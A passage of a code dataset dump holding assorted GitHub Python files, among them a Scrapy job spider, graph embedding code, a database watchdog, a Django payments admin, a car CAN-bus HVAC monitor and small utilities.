\"SELECT posts.title, posts.body, posts_post_user.name AS user_name \\nFROM posts JOIN users AS posts_post_user ON posts.user_id = posts_post_user.id GROUP BY posts.title, posts.body, posts_post_user.name\"\n )\n\n\n# or and not and and conditions in joins\n","repo_name":"dhanilan/dbchat","sub_path":"tests/test_sqlalchemy.py","file_name":"test_sqlalchemy.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31034939860","text":"from turtle import *\nfrom time import *\nimport turtle\n\nt = Turtle()\nt.pensize(2)\nt.speed(10000)\nturtle.bgcolor(\"black\")\ncolors = [\"red\", \"yellow\", 'purple', 'blue']\nt._tracer(False)\nfor x in range(400):\n t.forward(2*x)\n t.color(colors[x % 4])\n t.left(91)\nt._tracer(True)\ndone()\n","repo_name":"tear-0/pypyyy","sub_path":"爬虫案例/图.py","file_name":"图.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36572245676","text":"from scrapy.contrib.spiders.crawl import CrawlSpider\nfrom scraper_app.items import JobData\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy import Request\n\n\nclass JobDataSpider(CrawlSpider):\n name = \"manpower_fi\"\n allowed_domains = [\"www.manpower.fi\"]\n start_urls = []\n len = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90]\n for i in len:\n url = \"https://www.manpower.fi/fin/tyon-haku/?search=&offset=%d\" % i\n start_urls.append(url)\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n items = []\n jobs = hxs.select(\"//div[@class='span9 tablet-span9']/article\")\n\n for row in jobs:\n item = JobData()\n item['title'] = row.select(\"./div[@class='media-body']/a/h3/text()\").extract()[0].lower()\n item['link'] = \"https://www.manpower.fi\" + row.select(\"./div[@class='media-body']/a/@href\").extract()[0]\n item['source'] = \"www.manpower.fi\"\n items.append(item)\n\n for item in items:\n request = Request(\"%s\" % item['link'], callback=self.description_parse)\n request.meta['item'] = item\n yield request\n\n def description_parse(self, response):\n item = response.meta['item']\n item['location'] = response.xpath(\"//div[@class='mp-jobdetails-bold pull-left'][1]/text()\").extract()[0].lower()\n description_list = response.xpath(\"//div[@class='mp-article-body']/section/text()\").extract()\n\n item['description'] = \"\"\n for i in description_list:\n item['description'] += i\n\n return item\n","repo_name":"nnduc1994/ziliot_spider","sub_path":"spiders/Finland_spider/manpower_fi.py","file_name":"manpower_fi.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33707745377","text":"import datetime\n\nfrom sqlalchemy import Column, Enum, Integer, String, ForeignKey, DateTime, CheckConstraint\nfrom ClientServer.models.db_config import Base\n\nclass File(Base):\n __tablename__ = 'files'\n\n id = Column(Integer, primary_key=True)\n file_name = Column(String(50), CheckConstraint('length(file_name) > 3'), nullable=False)\n path = Column(String(600), nullable=False, default='./')\n user_id = Column(Integer, ForeignKey('users.id'))\n date = Column(DateTime, default=datetime.datetime.now())\n size = Column(Integer, CheckConstraint('size > 0'), default=0)\n","repo_name":"VanekCheck/map-reduce","sub_path":"ClientServer/models/File.py","file_name":"File.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39485956836","text":"import csv\nimport itertools\nimport math\nimport time\nimport logging\nimport sys\nimport os\nimport random\nimport warnings\nimport pandas as pd\nimport numpy as np\nimport scipy\nimport optuna\nimport sklearn.preprocessing as pp\n\nfrom tqdm import tqdm_notebook as tqdm\nfrom collections import Counter, defaultdict\n\nfrom pathlib import Path\nfrom sklearn import random_projection\nfrom sklearn.preprocessing import normalize, scale, MultiLabelBinarizer\nfrom scipy.sparse import coo_matrix, csr_matrix, csc_matrix, diags, spdiags, vstack, hstack\n\n# projection method: choose from Gaussian and Sparse\n# input matrix: choose from adjacency and transition matrix\n# alpha adjusts the weighting of nodes according to their degree\n\ndef adj_matrix_weight_merge(A, adj_weight):\n\n N = A[0][0].shape[0]\n temp = csr_matrix((N,N))\n for i in range(len(adj_weight)):\n \n try:\n temp = temp + adj_weight[i]*A[i][0].tocsr()\n # temp = temp + adj_weight[i]*(A[i][0]+csc_matrix(np.eye(N)))\n except:\n temp = temp + adj_weight[i]*A[0][i].tocsr()\n # temp = temp + adj_weight[i]*(A[0][i]+csc_matrix(np.eye(N)))\n return temp+temp.transpose()\n\ndef fastrp_projection(train, feature, final_adj_matrix, edge_type, q=3, dim=128, projection_method='gaussian', input_matrix='adj', alpha=None, s=1, threshold=0.95, gama=1, feature_similarity=False):\n assert input_matrix == 'adj' or input_matrix == 'trans'\n assert projection_method == 'gaussian' or projection_method == 'sparse'\n \n num_edge = len(edge_type)\n M = final_adj_matrix\n\n if feature_similarity == True:\n feature = pp.normalize(feature, axis=1).T\n \n\n # Gaussian projection matrix\n if projection_method == 'gaussian':\n transformer = random_projection.GaussianRandomProjection(n_components=dim, random_state=7)\n # Sparse projection matrix\n else:\n transformer = random_projection.SparseRandomProjection(n_components=dim, random_state=7)\n Y = transformer.fit(feature)\n \n\n # Construct the inverse of the degree matrix\n if input_matrix != 'adj':\n rowsum = M.sum(axis=1)\n colsum = M.sum(axis=0).T\n rowsum = np.squeeze(np.asarray(rowsum+colsum))**-1\n rowsum[np.isinf(rowsum)]=1\n D_inv = diags(rowsum)\n\n cur_U = transformer.transform(feature)\n if feature_similarity == True:\n cur_U = feature.T @ cur_U\n cur_U = M @ cur_U\n\n if input_matrix != 'adj':\n # normalization\n cur_U = D_inv @ cur_U\n U_list = [cur_U]\n\n for j in range(1, q):\n # cur_U = M @ cur_U\n cur_U = M.dot(cur_U)\n if input_matrix != 'adj':\n # normalization\n cur_U = D_inv @ cur_U\n\n U_list.append(cur_U)\n\n return U_list\n\n# When weights is None, concatenate instead of linearly combines the embeddings from different powers of A\ndef fastrp_merge(U_list, weights, edge_types, normalization=False, q=3):\n\n print('merge')\n num_edge = len(edge_types)\n\n if weights is None:\n # return np.concatenate(_U_list, axis=1)\n return hstack(U_list)\n \n U = np.zeros_like(U_list[0])\n for cur_U, weight in zip(U_list, weights):\n U += cur_U * weight\n try:\n U = U.todense()\n except:\n pass\n U = np.squeeze(np.asarray(U)) # convert numpy matrix to array\n return U.todense() if type(U) == csr_matrix else U\n\n# A is always the adjacency matrix\n# the choice between adj matrix and trans matrix is decided in the conf\ndef fastrp_wrapper(A, feature, motifs, conf):\n final_adj_matrix = adj_matrix_weight_merge(A, adj_weight = conf['adj_weight'])\n U_list = fastrp_projection(A,\n feature,\n final_adj_matrix,\n q=conf['q'],\n dim=conf['dim'],\n projection_method=conf['projection_method'],\n input_matrix=conf['input_matrix'],\n edge_type = conf['edge_type'],\n s=conf['s'],\n feature_similarity=conf['feature_similarity']\n )\n U = fastrp_merge(U_list, conf['weights'], conf['edge_type'], conf['normalization'], conf['q'])\n return U\n\ndef get_emb_filename(prefix, conf):\n return prefix + '-dim=' + str(conf['dim']) + ',projection_method=' + conf['projection_method'] \\\n + ',input_matrix=' + conf['input_matrix'] + ',normalization=' + str(conf['normalization']) \\\n + ',weights=' + (','.join(map(str, conf['weights'])) if conf['weights'] is not None else 'None') \\\n + ',alpha=' + (str(conf['alpha']) if 'alpha' in conf else '') \\\n + ',C=' + (str(conf['C']) if 'alpha' in conf else '1.0') \\\n + '.mat'\n\n","repo_name":"FAME-code/FAME","sub_path":"fastrp.py","file_name":"fastrp.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42877089037","text":"#!/usr/bin/python3\n\"\"\" 3-lru_cache.py \"\"\"\nfrom base_caching import BaseCaching\n\n\nclass LRUCache(BaseCaching):\n \"\"\" LRUCache class that inherits from BaseCaching \"\"\"\n\n def __init__(self):\n \"\"\" Initialize \"\"\"\n super().__init__()\n self.order = []\n\n def put(self, key, item):\n \"\"\" Add an item in the cache \"\"\"\n if key is None or item is None:\n return\n\n # if the key already exists, move it to the end of the list\n if key in self.cache_data:\n self.order.remove(key)\n # otherwise, if the cache is full, evict the least recently used item\n elif len(self.cache_data) >= BaseCaching.MAX_ITEMS:\n lru = self.order.pop(0)\n del self.cache_data[lru]\n print(\"DISCARD: {}\".format(lru))\n\n # add the new key to the end of the list and update the cache\n self.order.append(key)\n self.cache_data[key] = item\n\n def get(self, key):\n \"\"\" Get an item by key \"\"\"\n if key is None or key not in self.cache_data:\n return None\n\n ''' move the key to the end of the list'''\n self.order.remove(key)\n self.order.append(key)\n\n return self.cache_data[key]\n","repo_name":"ofemjohn/alx-backend","sub_path":"0x01-caching/3-lru_cache.py","file_name":"3-lru_cache.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23868249768","text":"import pandas\nimport subprocess\nfrom datetime import datetime\nfrom time import sleep\nimport dbo\n\nconfig_file = 'config.cfg'\nverbose = True\n\n### Create status functions - FUTURE move functions to seperate file ###\n\ndef watchdog_output_to_db(data_source_updates):\n #Post message to database\n session = dbo.output_db.engine()\n data = pandas.DataFrame()\n data = data.append(data_source_updates, ignore_index=True)\n data.to_sql(dbo.output_db.table, session, if_exists='append', index=False)\n #session.close()\n \ndef watchdog_status_message(status): \n status_ts = pandas.datetime.now()\n \n data_source_updates = pandas.Series(\n {'_server' : 'WatchdogStatusMessage',\n '_db_type' : None,\n '_table' : 'WatchdogStatusMessage',\n '_column' : None,\n '_last_update' : None,\n '_status' : status,\n '_query_timestamp' : status_ts })\n \n if verbose: print('WatchdogStatusMessage: ' + str(status))\n \n watchdog_output_to_db(data_source_updates)\n return None\n\ndef watchdog_parse_error(source, error):\n \n status_ts = pandas.datetime.now()\n \n _dbobject = eval('dbo.' + source.dbobject)\n _database = source.database\n _table = source.table\n _column = source.column\n \n data_source_updates = pandas.Series(\n {'_server' : _dbobject.server,\n '_db_type' : _dbobject.dbtype,\n '_table' : '%s.%s' %(_database,_table),\n '_column' : _column,\n '_last_update' : None,\n '_status' : 'WatchdogParseError: ' + str(error),\n '_query_timestamp' : pandas.datetime.now() })\n \n if verbose: print('WatchdogParseError: ' + str(error))\n \n watchdog_output_to_db(data_source_updates)\n return None\n\n### Begin primary functionality ###\n\n# Log watchdog start in output db\nwatchdog_status_message('start')\n\n# Get config file\ntry:\n source = pandas.read_csv(config_file,sep=',', header=None, quotechar=\"'\")\n source.columns = ['dbobject','database','table','column','timezone','parseint','active']\n\nexcept Exception as error:\n watchdog_status_message('Error loading initial config file - Terminating watchdog - ' + str(error))\n exit()\n\n# Initiate minute holder\n\nminute_previous = datetime.now().minute\n\nwhile True:\n\n # Get current minute\n minute_current = datetime.now().minute\n \n # If current minute != previous minute\n if minute_current != minute_previous:\n \n #Store current minute\n minute_previous = minute_current\n \n if verbose: print(datetime.now())\n \n #Send heartbeat to output table\n watchdog_status_message('heartbeat')\n \n #Check for updated config file\n source_ = source.copy(deep=True)\n \n try:\n source = pandas.read_csv(config_file,sep=',', header=None, quotechar=\"'\")\n source.columns = ['dbobject','database','table','column','timezone','parseint','active']\n \n except Exception as error:\n watchdog_status_message('Error loading config file')\n \n if source.equals(source_) == False:\n watchdog_status_message('Change detected in config file')\n \n # Check the schedule for each table\n for idx in source.index.values:\n \n # Check the minute against the interval setting\n # If minute mod interval = 0, call the parsing function\n if (source.active[idx]) * (minute_current % source.parseint[idx] == 0):\n \n # Call parsing function\n try:\n\n _dbobject = source.dbobject[idx]\n _database = source.database[idx]\n _table = source.table[idx]\n _column = source.column[idx]\n _timezone = source.timezone[idx]\n _parseint = source.parseint[idx]\n\n parse_cmd = \"python parse.py -o '\" + _dbobject + \"' -d '\" + _database + \"' -t '\" + _table + \"' -c '\" + _column + \"' -z '\" + _timezone + \"'\"\n\n if verbose: print(parse_cmd)\n \n subprocess.Popen(parse_cmd, shell=True)\n \n except Exception as error:\n if verbose: print(error)\n watchdog_parse_error(source.loc[idx], error)\n \n\n ### Hold for one second\n sleep(1)","repo_name":"data-ninja-1812/sample-portfolio","sub_path":"data-engineering/watchdog-v5/watchdog.py","file_name":"watchdog.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4689572031","text":"from django.contrib import admin, messages\nfrom apps.payments.models import Wallet, Transaction, TransactionStatus\nfrom .forms import TransactionForm\n\n\nclass WalletAdmin(admin.ModelAdmin):\n list_display = ('user', 'balance',)\n readonly_fields = ('user', 'balance', 'deleted_at',)\n search_fields = ('user__email',)\n\n\nclass TransactionAdmin(admin.ModelAdmin):\n form = TransactionForm\n list_display = ('reference', 'value', 'status',\n 'credit_to', 'debit_to', \"created_at\")\n list_filter = ('status', 'credit_to', 'debit_to')\n search_fields = ('reference', 'payment_provider_txn_id',)\n readonly_fields = ('deleted_at', 'updated_by',)\n\n def save_model(self, request, obj, form, change):\n # Call the clean method to trigger validation and apply logic\n if form.is_valid():\n form.instance.updated_by = request.user\n try:\n reference, value, message = form.process_transaction()\n except Exception as e:\n self.message_user(request, str(e), level=messages.ERROR)\n return\n\n form.instance.reference = reference\n form.instance.value = value\n\n if message:\n messages.success(request, message)\n return super().save_model(request, obj, form, change)\n\n def message_user(self, request, message, level=messages.SUCCESS, extra_tags='', fail_silently=False):\n if level == messages.ERROR:\n super().message_user(request, message, level, extra_tags, fail_silently)\n\n def get_readonly_fields(self, request, obj=None):\n if obj and obj.status == TransactionStatus.SUCCESSFUL:\n return self.readonly_fields + tuple(\n [\n item.name\n for item in obj._meta.fields\n if item.name not in [\"deleted_at\", \"updated_by\", ]\n ]\n )\n else:\n return self.readonly_fields\n\n\nadmin.site.register(Wallet, WalletAdmin)\nadmin.site.register(Transaction, TransactionAdmin)\n","repo_name":"gbolly/code_snippets","sub_path":"beta_eshopping/payments/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70882221869","text":"#!/usr/bin/python3\n#// Ford FG can0hvac\n#https://github.com/jakka351/FG-Falcon/\n#pip3 install regex uinput evdev python-can\nimport can \nimport time\nimport os\nimport queue\nimport sys, traceback\nfrom threading import Thread\n#############################\n#animation = \"|/-\\\\\"\n#############################\nHVAC = 0x353 #can id 851 \nHVAC_off = 0xAB # [5] A 129 0 0 34 [171] 0 0 All Off\nHVAC_TEMP = 0 #851 x4\nHVAC_OUT = 0 #Outside Temp 851 x5\nHVAC_FANSPEED = 0 #Fan speed 851 x8\nHVAC_VENTSTATUS = 0 #Vent tatus 851 x1\nVA = 0x4B # print('Foot Vents, Close Cabin')\nVB = 0x2B # print('Foot Vents, Open Cabin')\nVC = 0x2F # print('Window and Feet Vets, Open Cabin')\nVD = 0x4F # print('Window and Feet Vents, Close Cabin')\nVE = 0x5B # print('Face, Foot, Close Cabin')\nVF = 0x3B # print('Face, Foot, Open Cabin')\nVG = 0x33 # print('Face, Open Cabin')\nVH = 0x53 # print('Face, Close Cabin')\nVI = 0x27 # print('Window, Manual Fan')\nVJ = 0x26 # print('Window, Auto Fan')\nVK = 0x83 # print('A/C Off, Open Cabin')\nVL = 0x8B # print('A/C Off, Foot Vents, Open Cabin')\nVM = 0x8F # print('A/C Off, Foot and Window Vents, Open Cabin')\nVN = 0x9B # print('A/C Off, Foot and Face Vents, Open Cabin')\nVO = 0xA6 # print('A/C Off, Window Vents, Open Cabin')\nVP = 0xA7 # print('A/C Off, Manual Fan, Open Cabin')\nVQ = 0xC3 # print('A/C Off, Close Cabin')\nVR = 0xCB # print('A/C Off, Foot Vents, Close Cabin')\nVS = 0xCF # print('A/C Off, Foot and Window Vents, Close Cabin')\nVT = 0xDB # print('A/C Off, Foot and Face Vents, Close Cabin')\nVU = 0x43 # print('Auto, Close Cabin')\nVW = 0x23 # print('Auto, Open Cabin')\n#############################\ntry:\n bus = can.interface.Bus(channel='can0', bustype='socketcan') #bus channel & type refer to python-can docs\n \n time.sleep(0.05)\n print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n time.sleep(0.05)\n \n print(' ███████  ██████  ███████  █████  ██  ██████  ██████  ███  ██ ')\n time.sleep(0.05)\n print(' ██      ██       ██      ██   ██ ██  ██      ██    ██ ████  ██ ')\n time.sleep(0.05)\n print(' █████  ██  ███  █████  ███████ ██  ██  ██  ██ ██ ██  ██ ')\n time.sleep(0.05)\n print(' ██     ██  ██  ██     ██   ██ ██  ██  ██  ██ ██  ██ ██ ')\n time.sleep(0.05)\n print(' ██   ██████   ██  ██  ██ ███████  ██████  ██████  ██   ████ ')\n time.sleep(1.0)\n\n print(' ╔═╗╦ ╦╔╦╗╦ ╦╔═╗╔╗╔ ╔═╗╔═╗╔╗╔ ╦ ╦╦ ╦╔═╗╔═╗ ╔═╗╔═╗╦═╗╦╔═╗╔╦╗')\n time.sleep(0.08)\n print(' ╠═╝╚╦╝ ║ ╠═╣║ ║║║║───║ ╠═╣║║║ ╠═╣╚╗╔╝╠═╣║ ╚═╗║ ╠╦╝║╠═╝ ║ ')\n time.sleep(0.08)\n print(' ╩ ╩ ╩ ╩ ╩╚═╝╝╚╝ ╚═╝╩ ╩╝╚╝ ╩ ╩ ╚╝ ╩ ╩╚═╝ ╚═╝╚═╝╩╚═╩╩ ╩ ')\n\n print(' ')\n\n print(' https://github.com/jakka351/fg-falcon')\n \n print(' ')\n time.sleep(0.08)\n\n\n print(' ┌─┐┌─┐┌┐┌┌┬┐┬─┐┌─┐┬ ┬ ┌─┐┬─┐ ┌─┐┬─┐┌─┐┌─┐ ┌┐┌┌─┐┌┬┐┬ ┬┌─┐┬─┐┬┌─ ')\n time.sleep(0.15)\n print(' │ │ ││││ │ ├┬┘│ ││ │ ├┤ ├┬┘ ├─┤├┬┘├┤ ├─┤ │││├┤ │ ││││ │├┬┘├┴┐ ')\n time.sleep(0.15)\n print(' └─┘└─┘┘└┘ ┴ ┴└─└─┘┴─┘┴─┘└─┘┴└─ ┴ ┴┴└─└─┘┴ ┴ ┘└┘└─┘ ┴ └┴┘└─┘┴└─┴ ┴ ')\n time.sleep(0.15)\n print(' ')\n time.sleep(0.5)\n print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n \n time.sleep(4.0) \n os.system('cansend can0 353#4B.00.00.0F.16.00.00.04') \nexcept OSError:\n print('can0swc cannot start can0 or can1 interface: can0swc cant get it up: check wiring and config')\n #GPIO.output(led,False)\n exit()\n\n#############################\ndef can_rx_task(): # Recv can frames only with CAN_ID specified in SWC variable\n while True:\n message = bus.recv()\n if message.arbitration_id == HVAC: #CAN_ID variable\n q.put(message) # Put message into queue\n # print(message)\n\n\nq = queue.Queue()\nrx = Thread(target = can_rx_task)\nrx.start()\n#c = ''\ncount = 0\ntime.sleep(1.0)\n\n#############################\n# Main loop\ntry:\n while True:\n for i in range(1):\n while(q.empty() == True): # Wait until there is a message\n pass\n message = q.get()\n \n if message.arbitration_id == HVAC and message.data[3] != HVAC_TEMP:\n print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n print('╔═╗╦╦═╗╔═╗╔═╗╔╗╔ ╔╦╗╔═╗╔╦╗╔═╗ ┌─┐')\n print('╠═╣║╠╦╝║ ║ ║║║║ ║ ║╣ ║║║╠═╝ │ ')\n print('╩ ╩╩╩╚═╚═╝╚═╝╝╚╝ ╩ ╚═╝╩ ╩╩ └─┘')\n print(message.data[3] / 2)\n time.sleep(1.0)\n\n if message.arbitration_id == HVAC and message.data[4] != HVAC_OUT:\n\n print('──────────────────────────────────────────────��──── ─── ─── ─── ─── ─── ─── ')\n print('╔╦╗╔═╗╔╦╗╔═╗ ╔═╗╦ ╦╔╦╗╔═╗╦╔╦╗╔═╗ ┌─┐')\n print(' ║ ║╣ ║║║╠═╝ ║ ║║ ║ ║ ╚═╗║ ║║║╣ │ ')\n print(' ╩ ╚═╝╩ ╩╩ ╚═╝╚═╝ ╩ ╚═╝╩═╩╝╚═╝ └─┘')\n print(message.data[4])\n time.sleep(1.0)\n\n if message.arbitration_id == HVAC and message.data[7] != HVAC_FANSPEED:\n print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n print('╔╔═╗╔═╗╔╗╔ ╔═╗╔═╗╔═╗╔═╗╔╦╗ ')\n print(' ╠╣ ╠═╣║║║ ╚═╗╠═╝║╣ ║╣ ║║ ')\n print(' ╚ ╩ ╩╝╚╝ ╚═╝╩ ╚═╝╚═╝═╩╝ ')\n print(message.data[7])\n time.sleep(1.0)\n\n if message.arbitration_id == HVAC and message.data[0] != HVAC_VENTSTATUS:\n print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n print('╦ ╦╔═╗╔╗╔╔╦╗ ╔═╗╔╦╗╔═╗╔╦╗╦ ╦╔═╗')\n print('╚╗╔╝║╣ ║║║ ║ ╚═╗ ║ ╠═╣ ║ ║ ║╚═╗')\n print(' ╚╝ ╚═╝╝╚╝ ╩ ╚═╝ ╩ ╩ ╩ ╩ ╚═╝╚═╝')\n if message.data[0] == VA:\n print('Foot Vents, Close Cabin')\n if message.data[0] == VB:\n print('Foot Vents, Open Cabin')\n if message.data[0] == VC: \n print('Window and Foot Vents, Open Cabin')\n if message.data[0] == VD:\n print('Window and Foot Vents, Close Cabin')\n if message.data[0] == VE:\n print('Face, Foot, Close Cabin')\n if message.data[0] == VF:\n print('Face, Foot, Open Cabin')\n if message.data[0] == VG:\n print('Face, Open Cabin')\n if message.data[0] == VH: \n print('Face, Close Cabin')\n if message.data[0] == VI: \n print('Window, Manual Fan')\n if message.data[0] == VJ: \n print('Window, Auto Fan')\n if message.data[0] == VK:\n print('A/C Off, Open Cabin')\n if message.data[0] == VL:\n print('A/C Off, Foot Vents, Open Cabin')\n if message.data[0] == VM:\n print('A/C Off, Foot and Window Vents, Open Cabin')\n if message.data[0] == VN:\n print('A/C Off, Foot and Face Vents, Open Cabin')\n if message.data[0] == VO:\n print('A/C Off, Window Vents, Open Cabin')\n if message.data[0] == VP:\n print('A/C Off, Manual Fan, Open Cabin')\n if message.data[0] == VQ:\n print('A/C Off, Close Cabin')\n if message.data[0] == VR:\n print('A/C Off, Foot Vents, Close Cabin')\n if message.data[0] == VS:\n print('A/C Off, Foot and Window Vents, Close Cabin')\n if message.data[0] == VT:\n print('A/C Off, Foot and Face Vents, Close Cabin')\n if message.data[0] == VU:\n print('Auto, Close Cabin')\n if message.data[0] == VW: \n print('Auto, Open Cabin')\n time.sleep(1.2) \n print(' ')\n print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n \n\n if message.arbitration_id == HVAC and message.data[5] == HVAC_off:\n print('AC Off')\n time.sleep(1.0)\n\n if message.arbitration_id == HVAC and message.data[1] != 0:\n pass\n\n if message.arbitration_id == HVAC and message.data[2] != 0:\n pass\n\n if message.arbitration_id == HVAC and message.data[6] != 0:\n pass\n \n############################\n\n############################\n# end\nexcept KeyboardInterrupt:\n exit()\nexcept Exception:\n traceback.print_exc(file=sys.stdout)\n exit()\nexcept OSError:\n exit() \n############################\n# can0hvac\n############################\n\n","repo_name":"jakka351/FG-Falcon","sub_path":"resources/software/jakka351/can0hvac.py","file_name":"can0hvac.py","file_ext":"py","file_size_in_byte":12496,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"37"} +{"seq_id":"72550658346","text":"# create train\r\nclass Train():\r\n directions = ( #(x,y)\r\n (0,-2), #0, up\r\n (1,-2), #1, up-up-right\r\n (2,-2), #2, up-right\r\n (2,-1), #3, up-right-right\r\n (2,0), #4, right\r\n (2,1), #5, down-right-right\r\n (2,2), #6, down-right\r\n (1,2), #7, down-down-right\r\n (0,2), #8, down\r\n (-1,2), #9, down-down-left\r\n (-2,2), #10 down-left\r\n (-2,1), #11 down-left-left\r\n (-2,0), #12 left\r\n (-2,-1),#13 up-left-left\r\n (-2,-2),#14 up-left\r\n (-1,-2) #15 up-up-left\r\n )\r\n\r\n def __init__(self, startx, starty, startdir, c):\r\n self.x = startx\r\n self.y = starty\r\n self.direction = startdir\r\n self.speed = 0\r\n self.object = c.create_rectangle(startx-10, starty-10, startx+10, starty+10, outline='black')\r\n c.bind_all('', self.turn_left)\r\n c.bind_all('', self.turn_right)\r\n c.bind_all('', self.speed_up)\r\n c.bind_all('', self.slow_down)\r\n\r\n def turn_left(self, event):\r\n self.direction -= 1\r\n self.direction %= 16\r\n \r\n def turn_right(self, event):\r\n self.direction += 1\r\n self.direction %= 16\r\n \r\n def speed_up(self, event):\r\n if self.speed == 0:\r\n self.speed = 2\r\n elif self.speed == 2:\r\n self.speed = 4\r\n \r\n def slow_down(self, event):\r\n if self.speed == 4:\r\n self.speed = 2\r\n elif self.speed == 2:\r\n self.speed = 0\r\n\r\n def move_train(self, c):\r\n dir_vect = self.directions[self.direction]\r\n c.move(self.object, dir_vect[0] * self.speed, dir_vect[1] * self.speed)\r\n c.xview_scroll(dir_vect[0] * self.speed, 'units')\r\n c.yview_scroll(dir_vect[1] * self.speed, 'units')\r\n \r\n","repo_name":"jacobv1234/train-exploration-game","sub_path":"testing/4.independent-background/objects/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31254269007","text":"import sys\nfrom itertools import permutations\ninput = sys.stdin.readline\n\nk = int(input())\nop = input().split()\n\ndef chk(li):\n for i, e in enumerate(op):\n if not ((li[i]li[i+1])):\n return False\n return True\nmx = (0,)*(k+1)\nmn = (9,)*(k+1)\nfor li in permutations(range(10),(k+1)):\n if chk(li):\n now = tuple(li)\n if now>mx:mx = now\n if now < mn:mn = now\n\nprint(''.join(map(str,mx)))\nprint(''.join(map(str,mn)))\n\n","repo_name":"yunyshs01/algo","sub_path":"src/2529.py","file_name":"2529.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71234963627","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# Created By : Ben Feigenbaum\n# =============================================================================\n\"\"\"Creating training and testing dataset for training and evaluation\"\"\"\n# =============================================================================\n# Imports\nimport pandas as pd\n# =============================================================================\n\n\ndef fixnewlines(df):\n df['text'].replace(to_replace=[r\"\\\\t|\\\\n|\\\\r\", \"\\t|\\n|\\r\"], value=[\"\", \"\"], regex=True, inplace=True)\n return df\n\n\ndef add_class(type_, path):\n df = pd.read_json(path, lines=True, encoding='utf8').text.to_frame()\n df = fixnewlines(df)\n if type_ == 'real':\n df['class'] = 'human'\n else:\n df['class'] = 'machine'\n return df\n\n\ndef concat_dfs(df1, df2):\n df = pd.concat([df1, df2]).reset_index(drop=True)\n df.columns = [\"text\", \"labels\"]\n return df\n\n\nif __name__ == '__main__':\n _dir = \"C:/Users/User/Desktop/Project_Main/data/\"\n\n train_fake = add_class('fake', f'{_dir}{\"xl-1542M.train.jsonl\"}')\n train_real = add_class('real', f'{_dir}{\"webtext.train.jsonl\"}')\n\n test_fake = add_class('fake', f'{_dir}{\"xl-1542M.test.jsonl\"}')\n test_real = add_class('real', f'{_dir}{\"webtext.test.jsonl\"}')\n\n concat_dfs(train_fake, train_real).to_pickle(\"train_df_500000\")\n concat_dfs(test_fake, test_real).to_pickle(\"test_df_500000\")\n","repo_name":"BenF99/Twitter-NFN-Detector","sub_path":"Project_Main/train_test_setup/CreateTrainTestSplit.py","file_name":"CreateTrainTestSplit.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21162091000","text":"__author__ = 'keroth'\n\n\nimport string\n_base32_translate = str.maketrans(\n '0123456789ABCDEFGHKLMNPQRSTUWXYZIJOV',\n '0123456789ABCDEFGHIJKLMNOPQRSTUV110U'\n)\n\n_base32_alphabet='0123456789ABCDEFGHKLMNPQRSTUWXYZ'\n\n\ndef base32encode(number):\n \"\"\"Converts an integer to a base36 string.\"\"\"\n if not isinstance(number, (int, )):\n raise TypeError('number must be an integer')\n\n base32 = ''\n sign = ''\n\n if number < 0:\n sign = '-'\n number = -number\n\n if 0 <= number < len(_base32_alphabet):\n return sign + _base32_alphabet[number]\n\n while number != 0:\n number, i = divmod(number, len(_base32_alphabet))\n base32 = _base32_alphabet[i] + base32\n\n return sign + base32\n\ndef base32decode(number):\n number = number.translate(_base32_translate)\n return int(number, 32)\n\n","repo_name":"Keroth/StorageV2","sub_path":"Label/Base32.py","file_name":"Base32.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42806861272","text":"# -*- coding: utf-8 -*-\nimport time\nfrom random import randint\nfrom typing import List\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom fastapi import FastAPI\nfrom fastapi.testclient import TestClient\n\n\ndef get_urls(url: str, limit: int) -> List[str]:\n return [url + str(randint(1, limit)) for i in range(1, limit + 1)]\n\n\ndef test_sync_api_call(client: TestClient):\n sleep = 15\n urls = get_urls('/tests/sync?duration=', sleep)\n\n temp_res = client.get('/tests/sync/?duration=10')\n print(f'temp_res: {temp_res.json()}')\n\n start = time.time()\n\n with ThreadPoolExecutor(max_workers=10) as Pool:\n response = Pool.map(client.get, urls)\n\n print(f'time required {time.time() - start}')\n for res in response:\n print(res.json())\n\n return response\n\n\ndef test_async_api_call(client: TestClient):\n 